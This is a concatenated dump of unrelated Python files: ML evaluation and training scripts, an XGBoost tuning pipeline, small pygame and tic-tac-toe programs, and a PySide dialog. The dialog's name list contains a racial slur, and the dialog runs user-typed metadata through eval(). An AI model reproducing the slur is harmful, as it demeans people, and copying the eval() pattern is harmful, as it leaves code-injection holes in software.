print(batch_test_X)\n batch_test_X_mask = torch.autograd.Variable(torch.from_numpy(batch_test_X_mask).long().to(device))\n batch_test_X = torch.autograd.Variable(torch.from_numpy(batch_test_X).long().to(device))\n batch_pred_y = model(batch_test_X, batch_test_X_len, batch_test_X_mask, testing=True)\n r_idx = batch_idx.argsort()\n batch_pred_y = batch_pred_y.data.to(\"cpu\").numpy().argmax(axis=2)[r_idx]\n # print(batch_pred_y)\n pred_y[offset:offset+batch_size, :batch_pred_y.shape[1]] = batch_pred_y\n # model.train()\n assert len(pred_y) == len(test_X)\n\n if command:\n command = command.split()\n\n label_rest_xml(template, command[8], raw_X, pred_y)\n acc = check_output(command).split()\n print(acc)\n return float(acc[9][10:])\n else:\n return seqeval_evaluate(test_y, pred_y)\n\n\ndef recreate_data(language, test_X):\n with open(path.join(DATA_DIR, language, PREPARED_DIR, FN_WORD_IDX.format(language=language))) as f:\n mapping = json.load(f)\n rev_mapping = {v: k for k, v in mapping.items()}\n\n return [\n [rev_mapping[t] for t in sent if t != 0] for sent in test_X\n ]\n\n\ndef evaluate(runs, language, model_name, command, template):\n ae_data = np.load(path.join(DATA_DIR, language, PREPARED_DIR, FN_DATASET.format(language=language)))\n raw_X = recreate_data(language, ae_data['test_X'])\n results = []\n for r in range(runs):\n model = torch.load(path.join(DATA_DIR, language, MODEL_DIR, \"xu\" + model_name + \"_\" + str(r)))\n result = test(model, ae_data['test_X'], raw_X, command, template, ae_data['test_y'])\n results.append(result)\n if command:\n print(sum(results)/len(results))\n else:\n print(\"PREC: {0:.3f}, REC: {1:.3f}, F1: {2:.3f}\".format(\n round(sum(r[0] for r in results) / len(results), 3),\n round(sum(r[1] for r in results) / len(results), 3),\n round(sum(r[2] for r in results) / len(results), 3),\n ))\n\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--runs', type=int, default=5)\nparser.add_argument('--language', type=str, default=\"finnish\")\nparser.add_argument('--model_name', type=str, default=\"\")\nparser.add_argument('--official', default=False, action=\"store_true\")\nargs = parser.parse_args()\n\nif args.official:\n command = \"java --add-modules java.xml.bind -cp script/A.jar absa16.Do Eval -prd data/official_data/pred.xml -gld data/official_data/EN_REST_SB1_TEST.xml.gold -evs 2 -phs A -sbt SB1\"\n template = \"data/official_data/EN_REST_SB1_TEST.xml.A\"\nelse:\n command = template = None\n\nevaluate(args.runs, args.language, args.model_name, command, template)\n","sub_path":"script/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":6764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"565229144","text":"# -*- coding:utf-8 -*-\n#!/usr/bin/python2.7\nfrom __future__ import print_function\n\n#================================================================================\n# You can change the code here below! 可以改动以下配置代码修改超参优化目标和范围。\n#================================================================================\n# 一,配置优化目标条件\n\ntask_name = 'example'\nscore_func = 'ks' #优化评估指标,可以为 'ks'或'auc'\nscore_gap_limit = 0.03 #可接受train和validate最大评分差值gap\ntrain_data_path = './xx_train_data' #训练集数据位置\ntest_data_path = './xx_test_data' #测试集数据位置\noutputdir = './aa_pipeline_result_' + task_name #输出文件夹名\nn_jobs = 16 #并行任务数量\n\n#--------------------------------------------------------------------------------\n# 二,配置超参数初始值\n\n# 初始化参数\nparams_dict = dict()\n\n# 以下为待调整参数\n# booster参数\nparams_dict['learning_rate'] = 0.1 # 学习率,初始值为 0.1,通常越小越好。\nparams_dict['n_estimators'] = 50 # 加法模型树的数量,初始值为50。\n\n# tree参数\nparams_dict['max_depth'] = 3 # 树的深度,通常取值在[3,10]之间,初始值常取[3,6]之间\nparams_dict['min_child_weight']= 30 # 最小叶子节点样本权重和,越大模型越保守。\nparams_dict['gamma']= 0 # 节点分裂所需的最小损失函数下降值,越大模型越保守。\nparams_dict['subsample']= 0.8 # 横向采样,样本采样比例,通常取值在 [0.5,1]之间 \nparams_dict['colsample_bytree'] = 1.0 # 纵向采样,特征采样比例,通常取值在 [0.5,1]之间 \n\n# regulazation参数 \n# Omega(f) = gamma*T + reg_alpha* sum(abs(wj)) + reg_lambda* sum(wj**2) \n\nparams_dict['reg_alpha'] = 0 #L1 正则化项的权重系数,越大模型越保守,通常取值在[0,1]之间。\nparams_dict['reg_lambda'] = 1 #L2 正则化项的权重系数,越大模型越保守,通常取值在[1,100]之间。\n\n# 以下参数通常不需要调整\nparams_dict['objective'] = 'binary:logistic'\nparams_dict['tree_method'] = 'hist' # 构建树的策略,可以是auto, exact, approx, hist\nparams_dict['eval_metric'] = 'auc'\nparams_dict['silent'] = 1\nparams_dict['scale_pos_weight'] = 1 #不平衡样本时设定为正值可以使算法更快收敛。\nparams_dict['seed'] = 0\n\n#--------------------------------------------------------------------------------\n# 三,配置超参搜索范围\n\nparams_test1 = {'learning_rate': [0.1],'n_estimators':[50]} #此处应配置较大 learning_rate\n\nparams_test2 = { 'max_depth': [3], 'min_child_weight': [50,100,200] } \n\nparams_test3 = {'gamma': [0.1,0.5,1]}\n\nparams_test4 = { 'subsample': [0.9,1.0],'colsample_bytree': [1.0] } \n\nparams_test5 = { 'reg_alpha': [0.1,1] } \n\nparams_test6 = { 'reg_lambda': [0,0.1] }\n\nparams_test7 = {'learning_rate':[0.09,0.08],'n_estimators':[100]} #此处应配置较小learning_rate\n#===============================================================================\n\n\n\n\n\n\n\n\n#================================================================================\n#Don't change the code below!!! 以下代码请勿轻易改动。\n#================================================================================\nimport sys,os,json,datetime\nimport numpy as np\nimport pandas as pd\nfrom tianjikit.analysisfeatures import AnalysisFeatures\nfrom tianjikit.trainxgboost import TrainXgboost\nfrom tianjikit.tunning import Tunning\n\n\n# 定义对numpy浮点数和整数的json序列化类\nclass numpyJsonEncoder(json.JSONEncoder):\n def default(self, obj): \n if isinstance(obj,(np.float,np.float32,np.float64)): \n return float(obj)\n elif isinstance(obj, (np.int,np.int0,np.int8,np.int16,np.int32,np.int64)): \n return int(obj)\n else: \n return json.JSONEncoder.default(self, obj)\n\ndef main(dftrain,dftest,outputdir = outputdir,n_jobs = n_jobs,\n score_func = score_func, score_gap_limit = score_gap_limit,\n params_dict = params_dict):\n \n if not os.path.exists(outputdir):\n os.makedirs(outputdir)\n \n #================================================================================\n # 一,特征分析\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 1:START ANALYSIS FEATURES...')\n \n # 基本分析\n afs = AnalysisFeatures(dftrain,dftest)\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfbasic = afs.basic_analysises()\n\n # ks有效性分析\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfks = afs.ks_analysises()\n \n # 稳定性分析\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n dfpsi = afs.psi_analysises()\n \n print('save results... ')\n # 保存相应文件\n dfbasic.to_csv(outputdir + '/basic_analysises.csv',sep = '\\t',encoding = 'utf-8')\n dfks.to_csv(outputdir +'/ks_analysises.csv',sep = '\\t',encoding = 'utf-8')\n dfpsi.to_csv(outputdir + '/psi_analysises.csv',sep = '\\t',encoding = 'utf-8')\n try:\n dfbasic.to_excel(outputdir + '/basic_analysises.xlsx',encoding = 'utf-8')\n dfks.to_excel(outputdir +'/ks_analysises.xlsx',encoding = 'utf-8')\n dfpsi.to_excel(outputdir + '/psi_analysises.xlsx',encoding = 'utf-8')\n except:\n pass\n \n #================================================================================\n # 二,模型调参\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 2:START TUNNING XGBOOT...')\n \n # step0: 初始化\n tune = Tunning(dftrain,dftest,score_func = score_func,score_gap_limit = score_gap_limit, \n params_dict=params_dict,n_jobs=n_jobs)\n \n # step1: \n if 'params_test1' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step1: try relatively high learning_rate...')\n dfscore_best = tune.gridsearch_cv(params_test1,cv = 5,verbose_eval = 20)\n \n # step2:\n if 'params_test2' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step2: tune max_depth & min_child_weight...')\n dfscore_best = tune.gridsearch_cv(params_test2,cv = 5,verbose_eval = 20)\n \n \n # step3:\n if 'params_test3' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step3: tune gamma...')\n dfscore_best = tune.gridsearch_cv(params_test3,cv = 5,verbose_eval = 20)\n \n \n # step4:\n if 'params_test4' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step4: tune subsample & colsample_bytree...')\n dfscore_best = tune.gridsearch_cv(params_test4,cv = 5,verbose_eval = 20)\n\n \n # step5: \n if 'params_test5' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step5: tune reg_alpha...')\n dfscore_best = tune.gridsearch_cv(params_test5,cv = 5,verbose_eval = 20)\n \n \n # step6: \n if 'params_test6' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step6: tune reg_lambda...')\n dfscore_best = tune.gridsearch_cv(params_test6,cv = 5,verbose_eval = 20)\n \n \n # step7: \n if 'params_test7' in globals():\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step7: try relatively low learning_rate...')\n dfscore_best = tune.gridsearch_cv(params_test7,cv = 5,verbose_eval = 20)\n \n # step8: \n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('step8: train model with tuned parameters and fully train dataset...')\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n bst,dfimportance = tune.train_best()\n \n #generate results\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('save results... ')\n \n with open(outputdir +'/best_parameters.json','w') as f:\n json.dump(tune.params_dict,f,cls = numpyJsonEncoder)\n \n tune.dfmerge.to_csv(outputdir + '/dfresults',sep = '\\t',encoding = 'utf-8')\n try:\n tune.dfmerge.to_excel(outputdir + '/dfresults.xlsx',encoding = 'utf-8')\n except:\n pass\n \n bst.save_model(outputdir + '/bst.model')\n \n dfimportance.to_csv(outputdir + '/dfimportance',sep = '\\t',encoding = 'utf-8')\n try:\n dfimportance.to_excel(outputdir + '/dfimportance.xlsx',encoding = 'utf-8')\n except:\n pass\n \n #================================================================================\n # 三,模型报告\n #================================================================================\n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('PART 3:START MODEL REPORT...')\n \n # 训练xgboost模型\n model = TrainXgboost(dftrain = dftrain,dftest = dftest, coverage_th=0, ks_th=0,\n outliers_th=None, selected_features=None)\n bst = model.train(cv=5, model_idx=1,params_dict = tune.params_dict,n_jobs = n_jobs, verbose_eval = 20) \n model.test(bst)\n report_info = model.report_info\n \n \n # 保存相应文件\n print('\\nsave results... ') \n with open(outputdir + '/model_report','w') as f:\n f.write(report_info) \n \n \n nowtime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print('\\n================================================================================ %s\\n'%nowtime)\n print('task end.\\n')\n \n \nif __name__ == '__main__':\n print('\\ntask_name: %s '%task_name)\n dftrain = pd.read_csv(train_data_path,sep = '\\t',encoding = 'utf-8')\n dftest = pd.read_csv(test_data_path,sep = '\\t',encoding = 'utf-8')\n main(dftrain,dftest) \n \n####\n###\n##\n#\n \n\n \n","sub_path":"runpipeline.py","file_name":"runpipeline.py","file_ext":"py","file_size_in_byte":12049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"296789411","text":"import sys\nimport pygame\nfrom pygame.locals import QUIT\n\npygame.init()\n#画面の大きさ\nSURFACE = pygame.display.set_mode((900,900))\nFPSCLOCK = pygame.time.Clock()\n\ndef main():\n logo = pygame.image.load(\"pythonlogo.png\")\n theta = 0\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n theta += 1\n\n # 画面の色\n SURFACE.fill((255, 255, 255))\n\n #ロゴを開店し、中心が(200,150)の位置にロゴを描画\n new_logo = pygame.transform.rotate(logo,theta)\n rect = new_logo.get_rect()\n rect.center = (400,400)\n SURFACE.blit(new_logo,rect)\n\n pygame.display.update()\n FPSCLOCK.tick(50)\n\nif __name__ == '__main__':\n main()","sub_path":"draw_image4.py","file_name":"draw_image4.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"523888908","text":"class Morpion:\n\n pieces = [\"_ |\",\"X |\",\"O |\"]\n all_states = ['a','b']\n\n @staticmethod\n def show_scoring_in_board(scoring):\n for i in range(3):\n print(str(int(scoring[0][i*3]*100))+' | '+str(int(scoring[0][i*3+1]*100))+' | '+str(int(scoring[0][i*3+2]*100)))\n\n def __init__(self,silent):\n self.state = [0,0,0,0,0,0,0,0,0]\n self.winner = None\n self.draw = None\n self.silent = silent\n\n def set_state(self,i,id):\n self.state[i] = id\n\n def draw_board(self):\n for k in range(0,3):\n print(Morpion.pieces[self.state[k*3]]+\" \"+Morpion.pieces[self.state[k*3+1]]+\" \"+Morpion.pieces[self.state[k*3+2]])\n print(\"\\r\")\n\n def is_same_player(self,i,j,k):\n if (self.state[i] == self.state[j]) and (self.state[i] == self.state[k]):\n return self.state[i]\n else:\n return 0\n\n def is_valid(self,action):\n if isinstance(action,int):\n if action >= 0 and action <= 8:\n if self.state[action] == 0:\n return True\n return False\n\n def check_winner(self):\n self.winner = max([\n self.is_same_player(0,1,2),\n self.is_same_player(3,4,5),\n self.is_same_player(6,7,8),\n self.is_same_player(0,3,6),\n self.is_same_player(1,4,7),\n self.is_same_player(2,5,8),\n self.is_same_player(0,4,8),\n self.is_same_player(2,4,6)\n ])\n if self.winner and not self.silent:\n print(\"Player \"+str(self.winner)+\" (\"+Morpion.pieces[self.winner]+\") wins!\")\n\n def check_draw(self):\n if not self.winner and 0 not in self.state:\n self.draw = True\n if not self.silent:\n print(\"This is a draw!\")\n return True\n else:\n return False\n\n\n def is_done(self):\n return True if self.winner or self.draw else False\n\n\nif __name__=='__main__':\n jeu = Morpion()\n","sub_path":"morpion.py","file_name":"morpion.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"192861257","text":"from numpy import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import ensemble, linear_model\nfrom statsmodels.tsa.seasonal import seasonal_decompose\nimport math, itertools\n\n# Set params\nyear_start = 2019\nweek_start = 10\nplot_metric = 'revenue'\nmetric_suffix = '$'\n\n\n# Read data\nreal_df = pd.read_csv(f'Output/{year_start}_real.csv', header=0)\nproj_df = pd.read_csv(f'Output/{year_start}_projected.csv', header=0)\nall_hierarchies = list(sort(list(set(proj_df['hierarchy'].values))))\n\nreal_df = real_df[real_df['metric']==plot_metric]\nproj_df = proj_df[proj_df['metric']==plot_metric]\n\nnum_columns = min(len(all_hierarchies),2)\nnum_rows = min(math.ceil(len(all_hierarchies)/2),3)\nnum_batchs = math.ceil(len(all_hierarchies)/6)\n\n\nfor batch in range(num_batchs):\n\tlist_hierarchies = all_hierarchies[(batch*6):((batch+1)*6)]\n\tfig = plt.figure(figsize=(15*(num_columns/2),10*(num_rows/3)), dpi=200)\n\tfor k in range(len(list_hierarchies)):\n\t\tplot_hierarchy = list_hierarchies[k]\n\t\tplot_real_df = real_df[real_df['hierarchy'] == plot_hierarchy]\n\t\tplot_proj_df = proj_df[proj_df['hierarchy'] == plot_hierarchy]\n\n\t\tall_stores = list(set(plot_real_df['store_id'].values))\n\t\tproj_stores = list(set(plot_proj_df['store_id'].values))\n\t\tplot_real_df = plot_real_df[plot_real_df['store_id'].isin(proj_stores)]\n\n\t\tplot_real_df = plot_real_df.groupby(['year','week_num']).sum()[['value']]\n\t\tplot_proj_df = plot_proj_df.groupby(['year','week_num']).sum()[['projected_value']]\n\n\t\tplot_real_df.reset_index(inplace=True)\n\t\tplot_proj_df.reset_index(inplace=True)\n\t\tplot_df = pd.merge(plot_real_df, plot_proj_df, how='outer')\n\t\tplot_df.index = [str(x)+'-WK'+('0'*(y<10))+str(y) for (x,y) in zip(plot_df['year'].values,plot_df['week_num'])]\n\n\t\tgroup_vals = real_df.groupby('hierarchy').sum()['value']\n\t\tperc_all = group_vals[plot_hierarchy]/group_vals.sum()\n\n\t\t# Match proj with actual on day of split\n\t\tfor i in range(1,week_start-1):\n\t\t\tind = plot_df[(plot_df['year']==year_start) & (plot_df['week_num']==i)].index.values[0]\n\t\t\tplot_df.at[ind,'projected_value'] = nan\n\n\t\tind = plot_df[(plot_df['year']==year_start) & (plot_df['week_num']==week_start-1)].index.values[0]\n\t\tplot_df.at[ind,'projected_value'] = plot_df.loc[ind, 'value']\n\n\t\tax = fig.add_subplot(num_rows,num_columns,k+1)\n\t\tax.plot(arange(6,len(plot_df)),plot_df.iloc[6:,:]['value'].values,'-',color='#d45087',label=f'Actual {plot_metric}')\n\t\tax.plot(arange(6,len(plot_df)),plot_df.iloc[6:,:]['projected_value'].values,'--',color='#003f5c',label=f'Projected {plot_metric}')\n\t\tax.set_xticks(25*arange(0,len(plot_df)//25+1)-7)\n\t\tax.set_xticklabels([plot_df.index[x] for x in ax.get_xticks()], rotation=30)\n\t\tax.set_yticklabels([metric_suffix+str(int(x/1000))+'K' for x in ax.get_yticks()])\n\n\t\tylim = ax.get_ylim()\n\t\tax.plot([arange(len(plot_df))[plot_df.index==ind][0],arange(len(plot_df))[plot_df.index==ind][0]], ylim,'k--',linewidth=.6)\n\t\tax.axvspan(0,arange(len(plot_df))[plot_df.index==ind][0],color=\"gray\",alpha=.2)\n\t\tax.set_ylim(ylim)\n\t\tax.set_xlim([6,len(plot_df)])\n\t\tax.set_title(plot_hierarchy+f' ({round(100*perc_all,1)}% of Total)')\n\t\tax.legend(loc='upper left')\n\n\t\tfig.tight_layout()\n\t\tfig.savefig(f'Output/{year_start}_projected_{plot_metric}_batch{batch}.png')\n\n\n","sub_path":"plot_all_forecasts.py","file_name":"plot_all_forecasts.py","file_ext":"py","file_size_in_byte":3237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"387213070","text":"import itertools\nimport random\n\nfrom PySide2.QtWidgets import QDialog, QPushButton, QLineEdit, QLabel, QGridLayout, QTextEdit, QCheckBox\n\nfirst_names = ['Super', 'Awesome', 'Mega', 'Nasty', 'White', 'Sad', 'Disco', 'Sexy', 'Smelly', 'Hot',\n 'Topless', 'Mad']\nsecond_names = ['Pigeon', 'Worm', 'Nigga', 'Wombat', 'Dn4k', 'Cow', 'Monkey', 'Finger', 'Poop', 'Dog', 'Lama', 'Snake',\n 'Vilain']\n\nnames = list(map(lambda elem: elem[0] + elem[1], itertools.product(first_names, second_names)))\nfor i in range(6666):\n random.shuffle(names)\n\nnames_iterator = itertools.cycle(names)\n\n\ndef random_name():\n return next(names_iterator)\n\n\nclass CreateNodeDialog(QDialog):\n def __init__(self, on_create, parent):\n super().__init__(parent)\n\n self.on_create = on_create\n\n self.setLayout(QGridLayout())\n\n layout = self.layout()\n\n layout.addWidget(QLabel('Model'), 0, 0)\n\n self.model_textbox = QLineEdit('Dummy')\n layout.addWidget(self.model_textbox, 0, 1)\n\n layout.addWidget(QLabel('Name'), 1, 0)\n\n self.name_textbox = QLineEdit(random_name())\n layout.addWidget(self.name_textbox, 1, 1)\n\n layout.addWidget(QLabel('ComputeEngine observable'), 2, 0)\n\n self.observable_checkbox = QCheckBox()\n layout.addWidget(self.observable_checkbox, 2, 1)\n\n layout.addWidget(QLabel('Custom Metadata'), 3, 0)\n\n self.metadata_textbox = QTextEdit('{}')\n layout.addWidget(self.metadata_textbox, 3, 1)\n\n self.create_button = QPushButton('Create')\n layout.addWidget(self.create_button, 4, 1)\n\n self.create_button.clicked.connect(lambda: self._on_create())\n\n def _on_create(self):\n model = self.model_textbox.text()\n metadata = eval(self.metadata_textbox.toPlainText())\n metadata['name'] = self.name_textbox.text()\n\n if self.observable_checkbox.isChecked():\n metadata['computeengine.observable'] = True\n\n self.on_create(model, metadata)\n\n self.name_textbox.setText(random_name())\n","sub_path":"python/ui/createnodedialog.py","file_name":"createnodedialog.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"371751759","text":"import doctest\nimport copy\nimport functools\n\ndef autotest(func):\n globs = copy.copy(globals())\n globs.update({func.__name__: func})\n doctest.run_docstring_examples(\n func, globs, verbose=True, name=func.__name__)\n return func\n\n\nimport json\nfrom ast import literal_eval\n\nnom_fichier = 'information_u.json'\n\n\"\"\"methode divise par 16 le nombre de personne# \"\"\"\n\n\ndef calcul(nb_part):\n nb_grp = 16 // int(nb_part)\n\n return nb_grp\n\n\n\"\"\"rajout du JSON pour sauvegarder les compétenses et les niveaux\"\"\"\n\"\"\"methode pour sauvegarder dans un fichier json\"\"\"\n\n\ndef sav_com(item, lvl, comp):\n with open(nom_fichier, 'w') as fichier:\n json.dump(str({'nom': item, 'Niveau': lvl, 'compétence': comp}), fichier)\n\n\n\"\"\"methode pour lire le fichier json\"\"\"\n\n\ndef read_com():\n with open(nom_fichier, 'r') as fichier:\n information_user = json.load(fichier)\n return information_user\n\n\n\"\"\"rattachement de la méthode lire et sauvegarde dans la prise en compte des compétences\"\"\"\n\n\ndef comp(lvl, comp):\n comp = \"\"\n lvl = \"\"\n comp = input(\"\\033[32m La compétence :\\033[0m\").lower()\n for item in participant:\n lvl = input(\"\\033[32m Quel est le niveau de \" + item + \":\\033[0m\").lower()\n sav_com(item, lvl, comp)\n information_utilisateur = literal_eval(read_com())\n for (key, valeur) in information_utilisateur.items():\n print(f\"{key} est sur {valeur}\")\n\n\n\"\"\"methode qui randomise les participant dans groupe et les supprimes ce participant de la liste\"\"\"\n\n\ndef create_grp():\n for i in y:\n groupe = []\n for i in x:\n used = random.choice(participant)\n groupe.append(used)\n participant.remove(used)\n\n list_grp.append(groupe)\n\n if len(participant) < int(nb_part):\n groupe = []\n for item in participant:\n groupe = list_grp[-1]\n groupe.append(item)\n participant.remove(item)\n\n print(\"\\033[31mVoici les groupes {0}\\033[0m\".format(list_grp))\n\n \"\"\"Methode qui permet de tester une partie du code \"\"\"\n\n@autotest\ndef calcul(nb_part):\n \"\"\"NB only INT\n\n >>> calcul(4)\n 4\n\n \"\"\"\n return 16 // int(nb_part)\n\n \"\"\"methode qui vérouille la demande en interger et limite les demandes de groupe de 1 à 8 participants maximum\"\"\"\n\n\ndef check_nb_part():\n nb = \"0\"\n while int(nb) > 8 or int(nb) == 0:\n try:\n nb = int(input(\"\\033[32mVeuillez entrer le nombre de personne dans un groupe entre 1 et 8 personnes: \\033[0m\"))\n except ValueError:\\\n print(\"Vous n'avez pas saisi de nombre entre 1 et 8\")\n\n nb_part = nb\n\n return nb_part\n\nimport random\n\nprint(\"\\033[32m\\n----------------------------------------\\n\\033[0m\")\nprint('\\033[32mBienvenue dans votre application.\\033[0m')\nprint(\"\\033[32m\\n----------------------------------------\\n\\033[0m\")\n\n\"\"\"boucle qui indique à l'utilisateur ce qu'il souhaite faire et lance les méthodes en fonction des réponses\"\"\"\nchoix = \"\"\nwhile choix != \"q\":\n choix = input(\"\\033[33m\\n(s) Pour créer des groupes.\\n(q) Pour quitter.\\nVotre choix :\\033[0m\").lower()\n if choix == \"s\":\n participant = [\"Farid\", \"Marie\", \"Phichet\", \"Arthur\", \"Antoine\", \"Hatice\", \"Giovanni\", \"Mickael\",\n \"Rachid\", \"Julien\", \"Vivien\", \"Kevin\", \"Josephine\", \"Valentin\", \"Camille\", \"Tanguy\"]\n nb_part = check_nb_part()\n nb_grp = calcul(nb_part)\n x = range(int(nb_part))\n y = range(int(nb_grp))\n list_grp = []\n\n A = \"\"\n lvl = \"\"\n while A != \"o\" and A != \"n\":\n A = input(\"\\033[32m Souhaitez-vous faire des groupes par compétence. (o/n) : \\033[0m\").lower()\n if A == \"n\":\n create_grp()\n if A == \"o\":\n comp(lvl, comp)\n\n if choix == \"q\":\n print(\"A bientôt.\")","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3944,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"147451158","text":"import torch\nimport numpy as np\n\n\nclass ValueNetwork(torch.nn.Module):\n\n def __init__(self, alpha, input_size, output_size):\n\n super(ValueNetwork, self).__init__()\n\n self.input_size = input_size\n self.output_size = output_size\n\n self.fc1 = torch.nn.Linear(input_size, 128)\n self.fc2 = torch.nn.Linear(128, 128)\n self.fc3 = torch.nn.Linear(128, output_size)\n self.tanh = torch.nn.Tanh()\n self.relu = torch.nn.LeakyReLU()\n\n self.optimizer = torch.optim.Adam(lr=alpha, params=self.parameters())\n self.loss = torch.nn.MSELoss()\n\n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu:0')\n self.to(self.device)\n\n def forward(self, x):\n x = torch.Tensor(x).to(self.device)\n out = self.fc1(x)\n out = self.tanh(out)\n out = self.fc2(out)\n out = self.tanh(out)\n out = self.fc3(out)\n out = self.relu(out)\n out = out.to(torch.device('cpu:0'))\n return out\n\n def optimize(self, observations, rewards, iter=iter):\n\n for i in range(iter):\n\n self.optimizer.zero_grad()\n predictions = self.forward(observations)\n loss = self.loss(predictions, rewards)\n loss.backward(retain_graph=True)\n self.optimizer.step()\n","sub_path":"Trust-Region-Policy-Optimization/trpo/value_network.py","file_name":"value_network.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"483863230","text":"'''Train CIFAR10 with PyTorch.'''\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torchvision\nimport torchvision.transforms as transforms\n\nimport os\nimport argparse\n\nfrom models import depth_dynamic\nfrom NEAT import connection_gene\n#from utils import progress_bar\nfrom torch.autograd import Variable\nimport numpy as np\nimport pandas as pd\nimport time\n\nparser = argparse.ArgumentParser(description='PyTorch CIFAR10 Training')\nparser.add_argument('--lr', default=0.1, type=float, help='learning rate')\nparser.add_argument('--resume', '-r', action='store_true', help='resume from checkpoint')\nparser.add_argument('--mname',default='modulev5wc10c', type=str, help='model name for save')\nargs = parser.parse_args()\n\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0 # best test accuracy\nstart_epoch = 0 # start from epoch 0 or last checkpoint epoch\n\n# Data\nprint('==> Preparing data..')\ntransform_train = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntransform_test = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n])\n\ntrainset = torchvision.datasets.CIFAR100(root='./data', train=True, download=True, transform=transform_train)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size=78, shuffle=True, num_workers=2)\n\ntestset = torchvision.datasets.CIFAR100(root='./data', train=False, download=True, transform=transform_test)\ntestloader = torch.utils.data.DataLoader(testset, batch_size=10, shuffle=False, num_workers=2)\n\nclasses = ('plane', 'car', 'bird', 'cat', 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n# Model\nprint('==> Building model..')\n\nnet = depth_dynamic.modulenet_cifar()\nnet = net.to(device)\n\ngraph_matrix=[[[0],[1],[2]],[[0],[1],[2]],[[0],[1],[2]]]\n\n\"\"\"\nif device == 'cuda':\n net = torch.nn.DataParallel(net)\n cudnn.benchmark = True\n\"\"\"\nif args.resume:\n # Load checkpoint.\n print('==> Resuming from checkpoint..')\n assert os.path.isdir('./train/'+args.mname+'/checkpoints'), 'Error: no checkpoint directory found!'\n checkpoint = torch.load('./train/'+args.mname+'/checkpoints/best_check.plk')\n net.load_state_dict(checkpoint['net'])\n best_acc = checkpoint['acc']\n start_epoch = checkpoint['epoch']\n graph_matrix = checkpoint['graph']\n print(best_acc)\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.SGD(net.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)\n\n\ntrainpd = pd.DataFrame({\"epoch\":\"\",\"accuracy\":\"\",\"loss\":\"\"},index=[\"0\"])\n\nsavepath='./train/'+str(args.mname)+'/checkpoints/'\n\nif not os.path.exists(savepath):\n os.makedirs(savepath)\n\n# Training\ndef train(epoch,graph,graph1,graph2,connection):\n print('\\nEpoch: %d' % epoch)\n net.train()\n train_loss = 0\n correct = 0\n total = 0\n start_time=time.time()\n for batch_idx, (inputs, 